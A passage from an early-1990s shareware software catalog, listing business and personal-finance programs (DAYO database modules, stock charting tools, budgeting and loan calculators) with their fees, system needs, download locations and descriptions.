$45.00 + Registration benefits: Multiuser, Unlimited Records, Manual + (printed & disk), Phone Support. + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support. + Look for: DAYOBE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOBE.ZIP in IBMAPP forum LIB 6 on CompuServe; + DAYOBE.ZIP in IBM RTC LIB 3 on GEnie. + Download size: 230k + Description: + A system of creating and maintaining specialized pricing for + your customer/clients. Special printouts (Price Books/Catalogs) + may be printed to a standard printer, or to a Hewlett Packard + (tm) Laserjet or compatible. It requires the presence of DAYO + Inventory and DAYO POS (Point of Sale) programs/databases. + Special Price Book methods include Fixed, Margin/Cost Plus, and + List/Retail discounts. + + Product: Home Sales System + Avon(tm) Billing & Ordering program. See full description on + page 233. + + Product: MakeDemo + Presentation program with interactive menuing. See full + description on page 184. + + + 8.11 Marketing + + Product: Business Plan Master (IBM) + Professional business plan templates. See full description on + page 219. + + Product: Business Plan Master (Mac) + Professional business plan templates. See full description on + page 219. + + Chapter 8, "Business" 232 + + + + Product: Japanese Business Culture + Needs: IBM PC, DOS 3.3 or better. VGA monitor. Mouse + recommended. + Author: Niche Software, 714-892-9052 + Registration: $5.00 + Registration benefits: Mail support. + Version: 1.1 (03-23-92) + User benefits: Mail support. + Look for: JAP.ZIP on BBSs (call 714-636-2667 to download it at no + charge). + Download size: 260k + Description: + The purpose of the kit is to help your organization to prepare + for successful business transactions with the Japanese. Common + themes presented are to exercise patience,to respect + formalities, to expect to spend time establishing a + relationship,and to be sensitive to the culture. The option is + here for modifying the text portions with material specific to + the needs of an individual company. Features animation,scrolled + text,music,graphics. + + Product: Multilevel Marketing Simulator + Needs: IBM PC, DOS 2.0 or better. 640k RAM. + Author: LRV Company, 516-360-9178 + Registration: $39.00 + Registration benefits: Current disk, print manual, Tech support + by Mail, CompuServe, 24 hr. phone. First upgrade free. May + contribute material for possible inclusion in next release. + Version: 2.00 (06-28-91) + User benefits: Current disk, print manual, Tech support by Mail, + CompuServe, 24 hr. phone. First upgrade free. May contribute + material for possible inclusion in next release. + Look for: MLM$V200.EXE on BBSs; MLM200.EXE in USEN forum LIB 10 + on CompuServe. + Download size: 234k + Description: + A no holds barred look at MLM. Demonstrates how downlines can + grow to yield a 6 figure income in a hostile, competitive + environment. Users input details of marketing plan, product + acceptance, promotional budgets & strategies. Program projects + downlines, costs, retail profits, commissions, purchases, cash + status for each individual. Warns of unprofitable situations. + + Authorized distribution package explains MLM basics, includes + documentation and examples. + + Chapter 8, "Business" 233 + + + + Product: Sell More Software + Needs: IBM AT (80286), DOS 3.1 or better. 512k RAM. + Author: Droege Computing Services, Inc., 919-383-9749 + Registration: $100.00 + Registration benefits: User Manual, newsletter, software support, + notice of updates. + Version: 3.0 (12-31-91) + User benefits: User Manual, newsletter, software support, notice + of updates. + Look for: SELLMOR*.ZIP on BBSs. + Download size: 500k + Description: + Designed to facilitate the marketing, sales, and administrative + activities involved in selling computer software. Created + specifically for software developers and value-added re- + sellers, the program helps to plan projects, track contact with + prospects and clients, track support, and print custom letters + and forms. + + Product: Service Business Design + Service Business Design,Electronic Lecture. See full + description on page 223. + + + 8.12 Work-at-home + + See also: Home & hobby (page 348). + + Product: Business Plan Master (IBM) + Professional business plan templates. See full description on + page 219. + + Product: Business Plan Master (Mac) + Professional business plan templates. See full description on + page 219. + + Product: Home Sales System + Needs: IBM PC, DOS 3.0 or better. Hard disk. + Author: Grumpyware, 214-340-5231 + Registration: $50.00 + Registration benefits: Printed manual, CompuServe support. + Version: 3.2 (02-04-92) + User benefits: Printed manual, CompuServe support. + Look for: SALES.EXE on BBSs (call 214-457-8708 to download it at + no charge); SALES.EXE in HOME forum LIB 3 on CompuServe. + Download size: 192k + Description: + Designed for Avon(tm) representatives to automate the customer + billing and product ordering process. Prints bills, order + sheets, customer call lists, customer labels, End of Campaign + reports, and much more. + + Chapter 8, "Business" 234 + + + + Product: Label Master [***] + PC Magazine Editors Choice mailing list prog. See full + description on page 159. + + Product: Money Smith + Home Accounting Package for Windows 3.0. See full description + on page 249. + + Product: Multilevel Marketing Simulator + Examines & compares MLMs for income potential. See full + description on page 232. + + + 8.13 Training aids + + See also: Education, Computers (page 316). + + Product: Crossword Clipper for Windows + Crossword puzzle layout/publishing tool. See full description + on page 135. + + Product: Crossword Creator + Multi-lingual crossword puzzle editor. See full description on + page 413. + + + 8.14 Business utilities + + Product: AFFORD IT??? + Monetary calculator (annuities,savings,loans). See full + description on page 255. + + Product: Mail Machine [***] + Print Envelopes and Labels on all LaserJets. See full + description on page 64. + + Product: ORGANIZE! Your Home + Home/office inventory system. See full description on + page 383. + + Chapter 8, "Business" 235 + + + + Product: Parcel Shipping Program(PSP)(r) [***] + Needs: IBM PC, DOS 2.1 or better. Epson/IBM dot matrix printer. + Author: East Hampton Industries, 516-324-2224 + Registration: $125.00 + Registration benefits: Printed manual, unlimited support. + Version: 2.4 (02-24-92) + User benefits: Printed manual, unlimited support. + Look for: availability unknown on BBSs. + Download size: 400k + Special instructions: Product distribution restricted to the + United States. + Description: + Prints UPS approved manifest, COD Tags, and shipping labels. As + you enter shipping transactions PSP looks up the zone from the + ZIP code and calculates shipping charges. Supports all UPS + nd + rates including commercial, residential, 2 and next day, and + International. Keeps an address file for frequently shipped-to + customers and an easily erased file for one-time shipments. + Instructions included to help the UPS rep to get you started. + + Product: Personal Time Card + Electronic Time Card. See full description on page 97. + + Product: VMiX 386 + MSDOS MultiTasker MultiUser for 8086 to 486. See full + description on page 66. + + + 8.15 Software tools + + 8.15.1 For other + + Product: Badge-O-Magic + LaserJet Nametags Using Any dBASE III File. See full + description on page 54. + + Chapter 8, "Business" 236 + + + + Product: DAYO INDEX + Needs: IBM PC, DOS 3.3 or better. 500k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $25.00 + Registration benefits: Unlimited Records, Manual (printed & + disk), Phone Support. + Version: 3.0 (06-28-91) + User benefits: Unlimited Records, Manual (printed & disk), Phone + Support. + Look for: DAYOXE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOXE.ZIP in IBMAPP forum LIB 6 on CompuServe; + DAYOXE.ZIP in IBM RTC LIB 3 on GEnie. + Download size: 250k + Description: + Designed to manage the indexing of the DAYO databases. DAYO + applications all have multiple indexes, and because it is + recommended that they be reindexed at least once daily, DAYO + Index was created to simplify this process. + + Product: DAYO PASSWORDS + Needs: IBM PC, DOS 3.3 or better. 450k RAM; Hard Disk; DAYO + modules. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $35.00 + Registration benefits: Security, Manual (printed & disk), Phone + Support. + Version: 3.0 (06-28-91) + User benefits: Security, Manual (printed & disk), Phone Support. + Look for: DAYOIDE.EXE on BBSs (call 407-292-4921 to download it + at no charge); DAYIDE.ZIP in IBMAPP forum LIB 6 on CompuServe; + DAYOIDE.ZIP in IBM RTC LIB 3 on GEnie. + Download size: 250k + Description: + Provides DAYO Business Application users with a system of + database security through the use of passwords. Its use is + optional, but recommended in areas where more than one person + has access to the data. + + Product: Early Bird + Great Full-Featured Reminder/Calendar Program. See full + description on page 84. + + Product: EXTENDED BATCH LANGUAGE-PLUS! + The real Batch Language you wish DOS had. See full description + on page 69. + + Product: HyperPAD + The HyperMedia Platform for MS-DOS. See full description on + page 297. + + Product: PREP + Create Run-Time Mult-Choice Tests/Drills. See full description + on page 328. + + Chapter 8, "Business" 237 + + + + 8.16 Other + + Product: DAYO LOOKUP + Needs: IBM PC, DOS 3.3 or better. 450K RAM; Hard Disk; DAYO + Modules. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $35.00 + Registration benefits: Multiuser, Unlimited Records, Manual + (printed & disk), Phone Support, Security. + Version: 3.0 (06-28-91) + User benefits: Multiuser, Unlimited Records, Manual (printed & + disk), Phone Support, Security. + Look for: DAYOLE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOLE.ZIP in IBMAPP forum LIB 6 on CompuServe. + Download size: 270k + Description: + A routine for DAYO users to view data from any DAYO database or + dBase (tm) compatible database (.DBF). No editing is allowed. + This provides a 'safe' tool for users that do not have the need + to make changes to the databases. Has multi-level passwords. + + Product: DAYO SMART REPORTS + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $50.00 + Registration benefits: Multiuser, Manual (printed & disk), Phone + Support. + Version: 3.0 (06-28-91) + User benefits: Multiuser, Manual (printed & disk), Phone Support. + Look for: DAYORE.EXE (multiple files) on BBSs (call 407-292-4921 + to download it at no charge); DAYORE.ZIP in IBMAPP forum LIB 6 + (multiple files) on CompuServe; DAYORE.ZIP in IBM RTC LIB 3 + (multiple files) on GEnie. + Download size: 320k + Description: + Contains many reports/routines that will help you manage your + purchasing, inventory, invoices, backorders, sales, and your + databases. There are MANY Reports, Lists and Routines included + in Smart Reports, ie: Single Warehouse, Valuation Expanded, + ReOrder, Late PO, Margin (History), Vendor List, Customer List, + Inventory Item List, Expenses List, Warehouse Adjustments, HP + Laser Pull Sheet, Available Inventory, GL Posting Problems, + View Reports On Screen, and MANY more! + + Product: Ethics Awareness + Ethical Decision Making for business. See full description on + page 388. + + Product: KICK + Motivational/Inspirational Messages. See full description on + page 176. + + Chapter 8, "Business" 238 + + + + Product: PCStat + Easy to use statistical report program. See full description + on page 282. + + Chapter 9, "Finances" 239 + + + + + + Chapter 9 + Finances + + See also: Spreadsheet applications (page 148); Mathematics + (page 280); Business (page 190). + + + 9.1 Stock trading & analysis + + Product: Capital Gainz + Investment portfolio manager. See full description on + page 254. + + Product: PC Chart (CGA/HGC) + Needs: IBM PC, DOS 2.0 or better. CGA or Hercules monitor; 512k + RAM. Modem optional. + Author: Guru Systems Ltd., 604-299-1010 + Registration: $99.00 + Registration benefits: 30 data files (DOW 30 Industrials), data + conversion utility program (Supports Prodigy and Telescan + 2000), high-quality spiral-bound manual. + Version: 1.4 (01-01-92) + User benefits: 30 data files (DOW 30 Industrials), data + conversion utility program (Supports Prodigy and Telescan + 2000), high-quality spiral-bound manual. + Look for: PCC14*.ZIP (multiple files) on BBSs; PCC14.ZIP in + INVFORUM forum LIB 12 on CompuServe; PCC14.ZIP in INVESTOR'S + RTC LIB 3 on GEnie. + Download size: 335k + Description: + Bullish on the market? Or bearish? This program will help you + decide! It brings you a comprehensive set of technical + analysis tools to help you decide when to buy and sell stocks + and commodities. Mathematical algorithms help you determine + what action to take. The spreadsheet-like interface permits + easy editing and manual updating of up to 400 price files. For + anyone who prefers automatic updating, Lets you use All- + Quotes, Dial/Data, and GEnie to get price updates via modem. + + Chapter 9, "Finances" 240 + + + + Product: PC-CHART (EGA/VGA) + Needs: IBM PC, DOS 2.0 or better. EGA monitor, 512k RAM. Modem + optional. + Author: Guru Systems Ltd., 604-299-1010 + Registration: $99.00 + Registration benefits: 30 data files (Dow 30 Industrials), data + conversion utility program which supports Prodigy and Telescan + 2000, high-quality spiral-bound manual. + Version: 1.4 (01-01-92) + User benefits: 30 data files (Dow 30 Industrials), data + conversion utility program which supports Prodigy and Telescan + 2000, high-quality spiral-bound manual. + Look for: PCC14C*.ZIP (multiple files) on BBSs; PCC14C.ZIP in + INVFORUM forum LIB 12 on CompuServe; PCC14C.ZIP in INVESTORS' + RTC LIB 3 on GEnie. + Download size: 324k + Description: + Bullish on the market? Or Bearish? This program will help you + decide! It brings you a comprehensive set of technical + analysis tools to help you decide when to buy and sell stocks + and commodities. Mathematical algorithms help you determine + what actions to take. The spreadsheet-like interface permits + easy editing and manual updating of up to 400 price files. For + anyone who prefer automatic updating. Lets you use All-Quotes, + Dial/Data, and GEnie to get price updates via modem. + + Product: PRO$TOCK + Needs: IBM PC, DOS 3.0 or better. Prodigy software. Hard disk. + Author: Gateway Software + Registration: $29.00 + Registration benefits: One free update - set of disks - Latest + version. + Version: 1.5 (05-01-91) + User benefits: One free update - set of disks - Latest version. + Look for: PROS15.ZIP on BBSs; PROS15.ZIP in IBMCON forum LIB 2 on + CompuServe; PROS15.ZIP in IBM 615;3 RTC LIB 6 on GEnie. + Download size: 250k + Special instructions: Product distribution restricted to the + United States. + Description: + This software package compatible with Prodigy software lets + you: + v/ Define off-line up to 9 different lists of more than 1,000 + stock quotes (also bonds and mutual funds) + v/ Create lists of stocks symbols from scratch, or from + Metastock files + v/ Download daily in unattended mode predefined list of stock + quotes + v/ Browse, print and convert stock quotations (spreadsheet, + Lotus 1-2-3, Quicken 4.0) + C source kit included so you can write your own conversion + program. + + Chapter 9, "Finances" 241 + + + + Product: Stable - Technical Graphs + Needs: IBM PC, Windows 3.0 or better. + Author: WINTERRA Software Group, 303-470-6323 + Registration: $49.95 + Registration benefits: Latest version with printed manual; + support via phone/fax/CompuServe; special offer free CompuServe + IntroPak; major upgrade/feature pre-release notification; beta + test eligibility. + Version: 1.00 (09-25-91) + User benefits: Latest version with printed manual; support via + phone/fax/CompuServe; special offer free CompuServe IntroPak; + major upgrade/feature pre-release notification; beta test + eligibility. + Look for: STABLE10.ZIP on BBSs; STABLE.ZIP in INVFORUM forum LIB + 1 on CompuServe. + Download size: 138k + Description: + A powerful, yet easy to use technical analysis program written + specifically for the Microsoft Windows environment. Combines + some of the more popular technical analysis indicators - with + the graphical capabilities of Windows - to display and print + quality indicator studies used to analyze stocks, bonds, + options, etc. A unique chart "slider" allows quick comparisons + of important indicator events across all graphs. Reads + MetaStock(TM) v2.5 and ASCII data files. + + Product: $tokTraX + Stock portfolio and charting system. See full description on + page 254. + + Product: Total Investor for 1-2-3 + Needs: IBM PC, DOS 2.0 or better. CGA monitor. Lotus 1-2-3 v2.0 + or better, or Quattro Pro. + Author: Hughes Financial Services, 603-598-4676 + Registration: $35.00 + Registration benefits: Latest version mailed out along with one + year of data for all stocks in the DJIA. Support by phone and + on CIS. + Version: 2.01A (06-01-91) + User benefits: Latest version mailed out along with one year of + data for all stocks in the DJIA. Support by phone and on CIS. + Look for: TI123.ARC on BBSs (call 312-280-8565 to download it at + no charge); TI123.ARC in LOTUS forum LIB 2 on CompuServe. + Download size: 170k + Description: + An integrated portfolio management and technical analysis tool + for the Lotus 1-2-3 and Quattro Pro environments. The program + keeps track of securities, charts stocks and makes buy/sell + decisions based on technical indicators. These indicators + include moving averages, relative strength, momentum, RSI, and + many others. Total Investor maintains current and historical + quotes. Utility products are available from HFS to link Total + Investor to Compuserve, DJN/R, and FNN Signal. + + Chapter 9, "Finances" 242 + + + + Product: Total Investor for Symphony + Needs: IBM PC, DOS 2.0 or better. CGA monitor; modem. Lotus + Symphony v1.1 or better. + Author: Hughes Financial Services, 603-598-4676 + Registration: $50.00 + Registration benefits: Latest version mailed out along with one + year of data for all stocks in the DJIA. Support by phone and + on CIS. + Version: 2.01 (06-01-91) + User benefits: Latest version mailed out along with one year of + data for all stocks in the DJIA. Support by phone and on CIS. + Look for: TISYM.ARC on BBSs (call 312-280-8565 to download it at + no charge); TISYM.ARC in LOTUS forum LIB 6 on CompuServe. + Download size: 170k + Description: + An integrated portfolio management and technical analysis + template for use with Lotus Symphony. The program can be used + to keep track of securities, chart stocks, and make buy/sell + decisions based on technical indicators. These indicators + include moving averages, momentum, relative strength, RSI, and + many others. Total Investor updates both current quotes for + your portfolio and historical quotes for charting and analysis + through Dow Jones News Retrieval. + + Product: YieldBook + Bond Pricing Calculator. See full description on page 255. + + + 9.2 Personal finances + + See also: Business, Business finances (page 190). + + Product: AMORTZ + Needs: IBM PC, DOS 2.0 or better. + Author: Oregon Software Group, 503-643-0915 + Registration: $10.00 + Registration benefits: One year free upgrading, unlimited + support. + Version: 1.30 (06-30-91) + User benefits: One year free upgrading, unlimited support. + Look for: AMORTZ13.ZIP on BBSs (call 503-297-4070 to download it + at no charge); AMORTZ.ZIP in IBMAPP forum LIB 4 on CompuServe; + AMORTZ13.ZIP in IBM PC RTC LIB 3 on GEnie. + Download size: 110k + Description: + A very "User Friendly" financial loan system designed to be + useful and understandable to everyone - from teens trying to + swing a car loan to CPAs working on million dollar deals. It + can calculate any of the loan variables (Principal, Interest + Rate, Payment Amount or Number of Payments), immediately show + loan totals, and then generate "Payback" schedules (on screen + or hardcopy) by year. Try it on your monthly mortgage payment + to see what a dramatic difference $50 per month can make! + + Chapter 9, "Finances" 243 + + + + Product: C.A.R.S. + The Complete Automobile Reporting System. See full description + on page 191. + + Product: Chris's Automobile Recorder [***] + Vehicle Operation & Maint. Logger & Reminder. See full + description on page 381. + + Product: HOME BUDGET MANAGEMENT SYSTEM + Needs: IBM PC, DOS 2.1 or better. + Author: Brentson Worrell, 813-886-2282 + Registration: $35.00 + Registration benefits: Latest version disk, bypass Shareware + screen, tech support by phone or mail, future upgrades for + greatly reduced price. + Version: 4.21 (05-20-91) + User benefits: Latest version disk, bypass Shareware screen, tech + support by phone or mail, future upgrades for greatly reduced + price. + Look for: HBMS421.ZIP on BBSs; HBMS42.ZIP in IBMAPP forum LIB 4 + on CompuServe; HBMS421.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 150k + Description: + An easy to use financial record-keeping and reporting system, + offering complete flexibility by way of user design. It has a + simple & fast data entry method, and extensive screen & printed + reports. Also included are checkbook reconciliation and + printing, fiscal year support, transaction editing ability, + budgeting, and automatic entries via "templates". A special + "Test Drive" through the included sample data will introduce + you to what the program has to offer. + + Product: PC-DEAL + Double Entry Ledger Accounting System. See full description on + page 194. + + Product: Peronal Record Keeper + Storage of personal and family information. See full + description on page 383. + + Chapter 9, "Finances" 244 + + + + Product: TAX91 + Needs: IBM PC, DOS 2.0 or better. Epson FX/LQ,IBM Proprinter,or + HP LaserJet. + Author: F. Roland Bjorklund, 301-645-6819 + Registration: $45.00 + Registration benefits: State program for 10 or more states. + Version: 1.0 (01-01-92) + User benefits: State program for 10 or more states. + Look for: availability unknown on BBSs. + Download size: 360k + Special instructions: Product distribution restricted to the + United States. + Description: + Allows tax preparers and individuals to prepare Federal Form + 1040 U.S. Individual Tax Returns including more than 34 + supporting schedules and forms. An IRS approved signature 1040 + for EPSON FX/LQ,IBM Proprinter,or HP Laserjet. State programs + for registered uses. Pulldown menus, mouse support, and + context help. A natural method of entering and reviewing tax + data including scrolling forms, and single button switching + between forms. Popup Calculator. Fees schedule. Front page. + Editor's note: The author claims to release yearly updates for + this software around December/January. + + Product: Total Investor for 1-2-3 + Portfolio Manager/Technical Analysis Template. See full + description on page 241. + + Product: Total Investor for Symphony + Portfolio Manager/Technical Analysis Template. See full + description on page 241. + + 9.2.1 Finances & budgets + + Product: ACCEL + Needs: IBM PC, DOS 2.1 or better. + Author: JSOFT, 612-823-7197 + Registration: $14.95 + Registration benefits: One year phone/BBS support, printed manual + and disk. + Version: 1.0 (11-01-91) + User benefits: One year phone/BBS support, printed manual and + disk. + Look for: availability unknown on BBSs. + Download size: 30k + Description: + This menu driven program provides comparisons 4 different ways + of accelerating payments on a mortgage: paying a fixed amount + extra per month, paying the next month(s)'principal with no + maximum extra, paying the next month(s)' principal with a + maximum extra and paying bi-weekly. It has 5 different menu + options, 3 of which evaluate accelerated mortgage options, an + option to view the program documentation or print it and an + option to return to DOS. + + Chapter 9, "Finances" 245 + + + + Product: Cash Control + Needs: IBM PC, DOS 2.0 or better. 320k RAM. + Author: Adrian-Thomas Developments, Inc., 613-837-0684 + Registration: $29.95 + Registration benefits: EGA/VGA Color Graphics, Popup Calculator/ + Calendar, Free technical support. + Version: 1.21S (01-01-91) + User benefits: EGA/VGA Color Graphics, Popup Calculator/Calendar, + Free technical support. + Look for: availability unknown on BBSs; CASHC.ZIP in IBMAPP forum + LIB 4 on CompuServe. + Download size: 150k + Description: + Manage your Checking, Savings or Charge Accounts the Fast and + Easy way. Enter your transactions in pop up windows while + viewing your Checkbook Register. Recall your frequently used + transactions. Be reminded when payments and deposits are due, + with optional advanced notification. Search for transactions + forwards or backwards. Split transactions. Transfer funds + between accounts. Balance your accounts. Generate reports. View + bar and pie charts. Batch printing of checks on matrix or + laser printers. + + Product: CheckMate Plus [***] + Checkbook-based Accounting. See full description on page 191. + + Product: "Cheque-It-Out" + Needs: IBM PC, DOS 2.0 or better. 512k RAM. + Author: Hooper International, Inc., 719-528-8989 + Registration: $49.95 + Registration benefits: FREE unlimited technical support, latest + version of the program, printed/bound manual, graphics, pop-up + calculator, import/export, mouse support, account + reconciliation module, automated year-end closing and financial + utilities module. + Version: 1.1C (03-01-91) + User benefits: FREE unlimited technical support, latest version + of the program, printed/bound manual, graphics, pop-up + calculator, import/export, mouse support, account + reconciliation module, automated year-end closing and financial + utilities module. + Look for: availability unknown on BBSs; CIO.ZIP in PCVENC forum + LIB 5 on CompuServe. + Download size: 235k + Description: + A menu-driven, double-entry, personal accounting system + combining powerful bookkeeping methods with an easy-to-use, + full-featured design. Some features include passwords, pop-up + windows, context sensitive help, full range of accountant-ready + reports and pre/post dated transactions. Supports any checks + and any printers. Tracks income, expenses, assets, + liabilities, budgets and net worth. Works under Windows. Manage + your money like a financial whiz! + + Chapter 9, "Finances" 246 + + + + Product: EASY BANKING + Needs: IBM PC, DOS 3.2 or better. 384k RAM. + Author: The Durol Company, 604-524-1765 + Registration: $28.50 + Registration benefits: Printed manual, master disks, support. + Version: 1.2 (01-01-92) + User benefits: Printed manual, master disks, support. + Look for: availability unknown on BBSs. + Download size: 600k + Description: + Simple to use yet sophisticated menu driven system for managing + business or personal banking information. Pop up windows on + screen help, bottom line prompts and a manual on disk for easy + use. Track checks, withdrawals, deposits and automatic monthly + payments or deposits. With up to 98 expense categories and up + to 98 accounts it can generate several hundred statements and + reports. Pop up calendar and calculator. Many maintenance and + configuration options. + + Product: EliteCheck + Extremely easy checkbook/budget management. See full + description on page 253. + + Product: FPLAN-Captital Needs Planner + Needs: IBM PC, DOS 2.0 or better. + Author: First Financial Software, 407-352-2529 + Registration: $30.00 + st + Registration benefits: Free 800 Phone Support, Free 1 Upgrade, + 50% off other Upgrades, 20% off other FPLAN progs. + Version: 3.0 (04-21-91) + st + User benefits: Free 800 Phone Support, Free 1 Upgrade, 50% off + other Upgrades, 20% off other FPLAN progs. + Look for: availability unknown on BBSs. + Download size: 323k + Description: + A total capital needs (life insurance) planner designed for + easy use. Included are automatic demonstrations for each of the + functions to familiarize you with the program. All of your + data, from a comprehensive questionnaire, can be entered into + the program to determine the status of your desired capital + needs situation and printed out. Great for helping you achieve + the optimum situation for support of dependents in case of + premature death. + + Chapter 9, "Finances" 247 + + + + Product: FPLAN-Education Funding Planner + Needs: IBM PC, DOS 2.0 or better. + Author: First Financial Software, 407-352-2529 + Registration: $30.00 + st + Registration benefits: Free 800 Phone Support, Free 1 Upgrade. + 50% off other Upgrades, 20% off other FPLAN Progs. + Version: 3.0 (04-21-91) + st + User benefits: Free 800 Phone Support, Free 1 Upgrade. 50% off + other Upgrades, 20% off other FPLAN Progs. + Look for: availability unknown on BBSs. + Download size: 335k + Description: + A total college funding planner designed for easy use. Included + are automatic demonstrations for each of the functions to + familiarize you with the program. All of your data from a + comprehensive questionnaire, can be entered into the program to + determine the status of your desired college funding situation + and printed out. Great for helping you achieve your college + funding goals. + + Product: FPLAN-Income Protection Planner + Needs: IBM PC, DOS 2.0 or better. + Author: First Financial Software, 407-352-2529 + Registration: $30.00 + st + Registration benefits: Free 800 Phone Support, Free 1 Upgrade, + 50% off other Upgrades, 20% off other FPLAN progs. + Version: 3.0 (04-21-91) + st + User benefits: Free 800 Phone Support, Free 1 Upgrade, 50% off + other Upgrades, 20% off other FPLAN progs. + Look for: availability unknown on BBSs. + Download size: 296k + Description: + A total income protection (disability) planner designed for + easy use. Included are automatic demonstrations for each of the + functions to familiarize you with the program. All of your + data, from a comprehensive questionnaire, can be entered into + the program to determine the status of your desired income + protection status, if disabled and printed out. Great for + helping you achieve the optimum financial situation for income + protection. + + Chapter 9, "Finances" 248 + + + + Product: FPLAN-Personal Financial Plnr + Needs: IBM PC, DOS 2.0 or better. + Author: First Financial Software, 407-352-2529 + Registration: $30.00 + st + Registration benefits: Free 800 Phone Support, Free 1 Upgrade, + 50% off other upgrades, 20% off other FPLAN Progs. + Version: 3.0 (04-21-91) + st + User benefits: Free 800 Phone Support, Free 1 Upgrade, 50% off + other upgrades, 20% off other FPLAN Progs. + Look for: availability unknown on BBSs. + Download size: 660k + Description: + A total financial analysis planner designed for easy use. All + of your data, from a comprehensive questionnaire, can be + entered into the program to determine the status of your + personal financial situationconcerning: Budgeting (Income & + Expenses), Balance Sheet (Assets & Liabilities), and Net Worth. + Economic Assumptions (Inv Rates, Inflation & Taxes). College + Funding Requirements, Retirement, Captial Needs & Income + Protection Analysis included. Great for helping achieve + financial planning goals. + + Product: FPLAN-Retirement Planner + Needs: IBM PC, DOS 2.0 or better. + Author: First Financial Software, 407-352-2529 + Registration: $30.00 + st + Registration benefits: Free 800 Phone Support, Free 1 Upgrade, + 50% off other Upgrades, 20% off other FPLAN Progs. + Version: 3.0 (04-21-91) + st + User benefits: Free 800 Phone Support, Free 1 Upgrade, 50% off + other Upgrades, 20% off other FPLAN Progs. + Look for: availability unknown on BBSs. + Download size: 335k + Description: + A total retirement planner designed for easy use. Included are + automatic demonstrations for each of the functions to + familiarize you with the program. All of your data, from a + comprehensive questionnaire, can be entered into the program to + determine the status of your desired retirement situation and + printed out. Great for helping you achieve your retirement + goals. + + Chapter 9, "Finances" 249 + + + + Product: Loan Amortization + Needs: IBM PC, DOS 2.0 or better. + Author: TexaSoft, 214-291-2115 + Registration: $19.00 + Registration benefits: Registration, newsletter. + Version: 1.0 (06-01-91) + User benefits: Registration, newsletter. + Look for: LOAN.EXE on BBSs; LOAN.EXE in IBMAPP forum LIB 6 on + CompuServe. + Download size: 80k + Description: + Calculates payment for any amortized loan, paid by week, month, + year or other periods. Calculates and prints a full + amortization table. Also produces a loan comparison table by + interest rate and payoff period. + + Product: Money Smith + Needs: IBM AT (80286), Windows 3.0 or better. Mouse. + Author: Money Smith Systems + Registration: $29.95 + Registration benefits: Latest disk; Coupon for free upgrade to + next version through Dec 31 1992; 90 days support with money + back if not satisfied. + Version: 1.2 (09-15-91) + User benefits: Latest disk; Coupon for free upgrade to next + version through Dec 31 1992; 90 days support with money back if + not satisfied. + Look for: SMITH12A.ZIP on BBSs (call 617-354-8873 to download it + at no charge); SMITH.ZIP in IBMAPP forum LIB 4 on CompuServe. + Download size: 180k + Description: + A full featured double entry home accounting system for + Windows. Powerful point and press help and a toolbar make it a + snap to use. Windows setup program and help included. + + Includes budgeting, investment tracking, and full reporting of + assets, income, liabilities and expenses. Up to 200 accounts + per file and 32,000 transactions. Reports include investments, + net worth, income, budgeting, tax summary and check + reconciliation. Dynamic graphs for each type of account and + groups of accounts. + + Chapter 9, "Finances" 250 + + + + Product: My Little Realm + Needs: IBM PC, DOS 3.3 or better. 512k RAM, hard disk, CGA + monitor. + Author: My Little Realm + Registration: $40.00 + Registration benefits: Phone/CompuServe/mail support; newsletter. + Version: 1.0 (04-01-92) + User benefits: Phone/CompuServe/mail support; newsletter. + Look for: availability unknown on BBSs. + Download size: 2000k + Special instructions: Product distribution restricted to the + United States. + Description: + This menu-driven system lets you balance your checkbook; + monitor charge card expenditures; query those files; track and + total savings accounts; create name/address/phone database to + print labels, address envelopes, look up phone numbers, find + services (like Yellow Pages); make personal library for books, + compact disks, video tapes, etc.; create "memory" records to + help locate important documents like wills, Savings Bonds, + passports, anything; backup and retrieve your files; and more! + + Product: PC-GL General Ledger + General Ledger. See full description on page 195. + + Product: PCBUDGET + Needs: IBM PC, DOS 2.1 or better. Hard disk recommended. + Author: ProLogic Software, 513-677-1754 + Registration: $35.00 + Registration benefits: Printed manual, next version free, + support. + Version: 2.5 (03-24-92) + User benefits: Printed manual, next version free, support. + Look for: availability unknown on BBSs; PCBDGT.ZIP in IBMAPP + forum LIB 4 on CompuServe. + Download size: 339k + Description: + A simple and organized budgeting tool which can be used as a + simple checkbook manager or as a detailed record keeping and + tracking home accounting system. You can keep track of your + checking accounts, bank accounts, assets, expenses, incomes, + credit cards, loans, and bills. Can estimate your income + taxes, remind you of upcoming payments, print your checks, and + display a variety of reports. Completely menu driven with + mouse support and on-line help. + + Chapter 9, "Finances" 251 + + + + Product: Point & Shoot Home Manager + Needs: IBM PC, DOS 2.0 or better. 320k RAM. + Author: Applied Micro Systems Technology, 405-377-0444 + Registration: $35.00 + Registration benefits: Disk with latest version, manual, free + support and update notices. + Version: 2.0 (09-01-88) + User benefits: Disk with latest version, manual, free support and + update notices. + Look for: availability unknown on BBSs; PASH20.ZIP in IBMAPP + forum LIB 4 on CompuServe. + Download size: 120k + Description: + A collection of dedicated databases for complete home budgeting + and accounting, tracking of home maintenance, home inventory + and important record tracking, name and address tracking, and + vehicle maintenance recordkeeping. A full-featured financial + calculation system is included. This is not simply a home + budgeting or checkbook program like so many others, this is a + comprehensive home management system. + + Product: Savings Account Management Prg. + Needs: IBM PC, DOS 2.1 or better. + Author: M. P. Data, 615-349-7744 + Registration: $25.00 + Registration benefits: Printed manual, current version, reduced + price on future upgrades, notification of upgrades and other + M.P.Data software. + Version: 1.0 (06-22-89) + User benefits: Printed manual, current version, reduced price on + future upgrades, notification of upgrades and other M.P.Data + software. + Look for: SAVINGS*.ZIP on BBSs. + Download size: 300k + Description: + Maintains records for a savings account. Transactions include + deposits, withdrawals, auto-teller deposits and withdrawals, + interest, and service charges. Current balance is readily + displayed. Numerous reports, including several ways to list + transactions, expenditure summary in table form, and account + summary report. + + Chapter 9, "Finances" 252 + + + + Product: WinCheck + Needs: IBM AT (80286), Windows 3.0 or better. Mouse strongly + recommended. + Author: Wilson WindowWare, Inc., 206-937-9335 + Registration: $69.99 + Registration benefits: Printed Manual, tech support, 90-day money + back gaurantee. + Version: 3.0A (03-15-91) + User benefits: Printed Manual, 